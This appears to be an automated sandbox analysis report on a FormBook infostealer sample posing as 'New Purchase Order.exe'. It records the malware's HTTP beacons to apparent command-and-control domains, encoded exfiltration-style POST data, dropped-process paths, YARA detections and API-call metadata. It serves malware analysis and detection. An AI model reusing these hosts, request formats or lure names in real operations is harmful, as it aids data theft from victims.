                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                        Data Ascii: INvlf=4KMMWvJXtNIDyWazqJqEb9tiwvBXY6HQXUm9E/dKPsgpgCRIyOTsI7b++Rz0UVc7tMYZU4ba4MEF3IPc1ehnDezbhQEPMhoiemeONYDPcSIIRsPrw9H41uF3ZHBS0vmLOwqdqokwTayynsAie2fCRKMEc+cZ2KNlbCVCcxSLhIJ5yvI/9ZbAzjb2id4rQiEB9e5rAGVArg99WmwW1Q==
                                                        Dec 3, 2024 14:17:14.861565113 CET | 697 | IN | HTTP/1.1 405 Not Allowed
                                                        Server: nginx
                                                        Date: Tue, 03 Dec 2024 13:17:14 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 552
                                                        Connection: close
                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        3 | 192.168.2.9 | 49923 | 107.155.56.30 | 80 | 5828 | C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 3, 2024 14:17:15.922588110 CET | 1833 | OUT | POST /2gcl/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.expancz.top
                                                        Origin: http://www.expancz.top
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1230
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.expancz.top/2gcl/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                        Data Ascii: INvlf= [TRUNCATED]
                                                        Dec 3, 2024 14:17:17.521039963 CET | 697 | IN | HTTP/1.1 405 Not Allowed
                                                        Server: nginx
                                                        Date: Tue, 03 Dec 2024 13:17:17 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 552
                                                        Connection: close
                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        4 | 192.168.2.9 | 49930 | 107.155.56.30 | 80 | 5828 | C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 3, 2024 14:17:18.585093021 CET | 533 | OUT | GET /2gcl/?INvlf=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmdZelj0tsTwcFH17YLMDQdjUbN6i8hA==&afo=JnyH0Z2 HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.expancz.top
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                        Dec 3, 2024 14:17:20.238722086 CET | 1236 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 03 Dec 2024 13:17:19 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 9651
                                                        Last-Modified: Fri, 15 Nov 2024 02:47:44 GMT
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        ETag: "6736b650-25b3"
                                                        Accept-Ranges: bytes
                                                        Data Ascii: <!DOCTYPE html><html><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no"><meta name=keywords content=""><meta name=description content=""><meta property=og:type content=website><meta property=og:title content=""><meta property=og:description content=""><meta property=og:url content=""><meta property=og:image content=""><meta name=HandheldFriendly content=true><meta name=apple-mobile-web-app-capable content=yes><meta name=apple-mobile-web-app-status-bar-style content=black><meta name=format-detection content="telphone=no, email=no"><meta name=screen-orientation content=portrait><meta name=x5-orientation content=portrait><meta name=full-screen content=yes><meta name=x5-fullscreen content=true><meta name=browsermode content=application><meta name=x5-page-mode content=app><meta name=msapplication-tap-highlight content=no><meta http-equiv=X-UA-Compatible content="ie=edge"><link href=https:
                                                        Dec 3, 2024 14:17:20.238740921 CET | 1236 | IN
                                                        Data Ascii: //l3filejson4dvd.josyliving.com/favicon.ico type=image/x-icon rel=icon><style>#POP800_INIT_DIV { display: none!important; } #POP800_PANEL_DIV { display: none!important; } #POP800_LEAVEWORD_DIV { display: none!
                                                        Dec 3, 2024 14:17:20.238748074 CET | 1236 | IN
                                                        Data Ascii: xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); } }else if(window.XMLHttpRequest){ //FirefoxOpera 8.0+SafariChrome xmlHttp = new XMLHttpRequest(); } /
                                                        Dec 3, 2024 14:17:20.238873959 CET | 672 | IN
                                                        Data Ascii: myBody.appendChild(myScript); return true; }else{ return false; } }else{ return false; } } var pathInfo = ''; var baseJsUrl = isAtm ? 'https://dq0ib5xlct7tw.cloudfron
                                                        Dec 3, 2024 14:17:20.238879919 CET | 1236 | IN
                                                        Data Ascii: yahooSource: '3', tikTokSource: '4' }; // // function checkSource(data, ch) { return Object.keys(data).map(function (key) { return data[key] }).indexOf(ch)
                                                        Dec 3, 2024 14:17:20.238887072 CET | 1236 | IN
                                                        Data Ascii: t.async = !0; t.src = v; s = b.getElementsByTagName(e)[0]; s.parentNode.insertBefore(t, s) }(window, document, 'script', 'https://connect.facebook.net/en_US/fbevents.js'); fbq('dataProcessi
                                                        Dec 3, 2024 14:17:20.239329100 CET | 1236 | IN
                                                        Data Ascii: = 0; n < ttq.methods.length; n++) ttq.setAndDefer(e, ttq.methods[ n]); return e }, ttq.load = function(e, n) { var i = "https://analytics.tiktok.com/i18n/pixel/events.js"; ttq._i = ttq._i
                                                        Dec 3, 2024 14:17:20.239335060 CET | 1236 | IN
                                                        Data Ascii: aLayer.push(arguments);} gtag('js', new Date()); gtag('config', google_id || 'G-CC0LH72W84'); console.log('google PageView');</script><script type=application/javascript>if(localStorage.source === sourceData.yahooSource) { (f
                                                        Dec 3, 2024 14:17:20.239341021 CET | 578 | IN
                                                        Data Ascii: = now; }, false); // // // document.addEventListener('gesturestart', function (event) { // event.preventDefault(); // }); }</script><link href=/static/css/app.8625cfbde75fd1ee0a0c2bb00d896


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        5 | 192.168.2.9 | 49948 | 54.179.173.60 | 80 | 5828 | C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 3, 2024 14:17:26.270303965 CET | 823 | OUT | POST /y49d/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.taxiquynhonnew.click
                                                        Origin: http://www.taxiquynhonnew.click
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 194
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.taxiquynhonnew.click/y49d/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                        Data Ascii: INvlf=r4rKcibVSx4vBQRZBwBaNoLvbBNGhs+G/PHzvokdAncuO7K4XAXhJXpnz63f//TzIM4SVG09rhp4coRzSgDjen+Cj1O8jeUc2ciuXrdeaVTYwroIx9J5S+2qdSqUfBtYdv3W8RrYUQWV6Mg7QYIYgUywznvmG9dQkEWA+rD5BgtCIV5mquSm3ZcgZPw/


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        6 | 192.168.2.9 | 49956 | 54.179.173.60 | 80 | 5828 | C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 3, 2024 14:17:28.938545942 CET | 847 | OUT | POST /y49d/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.taxiquynhonnew.click
                                                        Origin: http://www.taxiquynhonnew.click
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 218
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.taxiquynhonnew.click/y49d/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                        Data Ascii: INvlf=r4rKcibVSx4vTgBZNzpaKILsVhNGrM+K/PLzvqINAx0uOZi4NEDhH3pnnq3WivT6IM0kVEw9rh94ct1zVSrie3+EqVO+8OUc2ciuXrJ4aR/Ywb4IxY9+MO2rQCqUbBtcdv308UzhUT+V6Mw7epIbz0y29HvtIf8/o3Sr16TCWS9VGUF47cb9iOcHeo5X31NmxEc7DsBcrDMnS4sCyg==
                                                        Dec 3, 2024 14:17:30.561443090 CET | 371 | IN | HTTP/1.1 301 Moved Permanently
                                                        Server: openresty
                                                        Date: Tue, 03 Dec 2024 13:17:30 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Location: https://www.taxiquynhonnew.click/y49d/
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        7 | 192.168.2.9 | 49962 | 54.179.173.60 | 80 | 5828 | C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 3, 2024 14:17:31.707395077 CET | 1860 | OUT | POST /y49d/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.taxiquynhonnew.click
                                                        Origin: http://www.taxiquynhonnew.click
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1230
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.taxiquynhonnew.click/y49d/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                        Data Ascii: INvlf= [TRUNCATED]
                                                        Timestamp: Dec 3, 2024 14:17:33.191500902 CET, Bytes transferred: 371, Direction: IN, Data:
                                                        HTTP/1.1 301 Moved Permanently
                                                        Server: openresty
                                                        Date: Tue, 03 Dec 2024 13:17:32 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Location: https://www.taxiquynhonnew.click/y49d/
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                        Session ID: 8, Source IP: 192.168.2.9, Source Port: 49968, Destination IP: 54.179.173.60, Destination Port: 80, PID: 5828, Process: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                                                        Timestamp: Dec 3, 2024 14:17:34.443656921 CET, Bytes transferred: 542, Direction: OUT, Data:
                                                        GET /y49d/?INvlf=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA==&afo=JnyH0Z2 HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.taxiquynhonnew.click
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                        Timestamp: Dec 3, 2024 14:17:35.999140978 CET, Bytes transferred: 506, Direction: IN, Data:
                                                        HTTP/1.1 301 Moved Permanently
                                                        Server: openresty
                                                        Date: Tue, 03 Dec 2024 13:17:35 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Location: https://www.taxiquynhonnew.click/y49d/?INvlf=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA==&afo=JnyH0Z2
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                        Target ID:0
                                                        Start time:08:15:39
                                                        Start date:03/12/2024
                                                        Path:C:\Users\user\Desktop\New Purchase Order.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\New Purchase Order.exe"
                                                        Imagebase:0x440000
                                                        File size:811'008 bytes
                                                        MD5 hash:C4A4FD2E695F61CEFCF6BACD76FD91E5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:08:15:44
                                                        Start date:03/12/2024
                                                        Path:C:\Users\user\Desktop\New Purchase Order.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\New Purchase Order.exe"
                                                        Imagebase:0xd50000
                                                        File size:811'008 bytes
                                                        MD5 hash:C4A4FD2E695F61CEFCF6BACD76FD91E5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1945000489.0000000001B60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1946849090.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:08:16:29
                                                        Start date:03/12/2024
                                                        Path:C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe"
                                                        Imagebase:0x2d0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2611853715.0000000003450000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:8
                                                        Start time:08:16:33
                                                        Start date:03/12/2024
                                                        Path:C:\Windows\SysWOW64\tzutil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\tzutil.exe"
                                                        Imagebase:0x3d0000
                                                        File size:48'640 bytes
                                                        MD5 hash:31DE852CCF7CED517CC79596C76126B4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2614825871.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2610575297.0000000002680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:9
                                                        Start time:08:16:46
                                                        Start date:03/12/2024
                                                        Path:C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe"
                                                        Imagebase:0x2d0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2611954893.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:11
                                                        Start time:08:16:58
                                                        Start date:03/12/2024
                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                        Imagebase:0x7ff73feb0000
                                                        File size:676'768 bytes
                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                          Execution Graph

                                                          Execution Coverage:12.4%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:2.3%
                                                          Total number of Nodes:128
                                                          Total number of Limit Nodes:9

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $%q
                                                          • API String ID: 0-3689577991
                                                          • Opcode ID: eb050985aa44b26028dc6b69d1cbd2e9f485fa3c438d20db213517751884167f
                                                          • Instruction ID: 62c011424ae93b1e55e3f0b5825f4b8798099b488c248de9bd15a7fb2f5610a5
                                                          • Opcode Fuzzy Hash: eb050985aa44b26028dc6b69d1cbd2e9f485fa3c438d20db213517751884167f
                                                          • Instruction Fuzzy Hash: EFC18F70B04245CFDB44DFA4C894AAEBBB2FF88300F108999E546AF365DB74E945CB91

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $%q
                                                          • API String ID: 0-3689577991
                                                          • Opcode ID: 3c30a282abdf1166553a26c2e5d6acc659bf230948626cc472853eb16cad746c
                                                          • Instruction ID: 86ff7e97eccf70ec487ebf3a971dab1a36bc11d95f0fe3fd58b98ff9850d4b10
                                                          • Opcode Fuzzy Hash: 3c30a282abdf1166553a26c2e5d6acc659bf230948626cc472853eb16cad746c
                                                          • Instruction Fuzzy Hash: BDC1B070B04245CFDB04DFA4C894AAEBBB2FF88300F108999E546AF365DB74E945CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 340ce61949bd1af1e8ce583a01f2df16c10f1bf1a77572008f05a4f6b1bd7e4f
                                                          • Instruction ID: 1e9ce4268c98d02be1bd15c350489f043447f7ba5930f0d618a427bf9a5785be
                                                          • Opcode Fuzzy Hash: 340ce61949bd1af1e8ce583a01f2df16c10f1bf1a77572008f05a4f6b1bd7e4f
                                                          • Instruction Fuzzy Hash: 14A17F35E00319DFCB05DFA4E8549EDBBBAFF89314F158619E416AB360DB30A941DBA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bce79b215289bf31943a11b7cfec2a7f4db01d523ec35af97e8d2043774ff581
                                                          • Instruction ID: a11293edb0d71b7bcb56bcb6f4f9bf4b60c0ceb0c3fa49036fe78777e1ef3df9
                                                          • Opcode Fuzzy Hash: bce79b215289bf31943a11b7cfec2a7f4db01d523ec35af97e8d2043774ff581
                                                          • Instruction Fuzzy Hash: DB910670E04295CFDB05DF64D88456EFFB2BF56304B1988AAD8119B257C635CC85CBA1
                                                          Memory Dump Source

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 04DB0AEE
                                                          • GetCurrentThread.KERNEL32 ref: 04DB0B2B
                                                          • GetCurrentProcess.KERNEL32 ref: 04DB0B68
                                                          • GetCurrentThreadId.KERNEL32 ref: 04DB0BC1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Current$ProcessThread
                                                          • String ID:
                                                          • API String ID: 2063062207-0



                                                          Control-flow Graph

                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04DB5342
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04DB5342
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04DB5342
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0

                                                          Control-flow Graph (legend: Executed / Not Executed)
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04DB5342
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0

                                                          Control-flow Graph (legend: Executed / Not Executed)
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 00D28F79
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0

                                                          Control-flow Graph (legend: Executed / Not Executed)
                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 04DB78C1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0

                                                          Control-flow Graph (legend: Executed / Not Executed)
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 00D28F79
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0

                                                          Control-flow Graph (legend: Executed / Not Executed)
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04DB0D3F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0

                                                          Control-flow Graph (legend: Executed / Not Executed)
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04DB0D3F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0

                                                          Control-flow Graph (legend: Executed / Not Executed)
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00D2E89E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
